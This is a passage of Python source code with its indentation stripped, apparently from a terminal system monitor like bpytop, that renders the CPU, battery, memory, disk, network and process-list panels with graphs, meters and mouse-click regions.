Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
            freq: str = f'{cpu.cpu_freq} MHz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
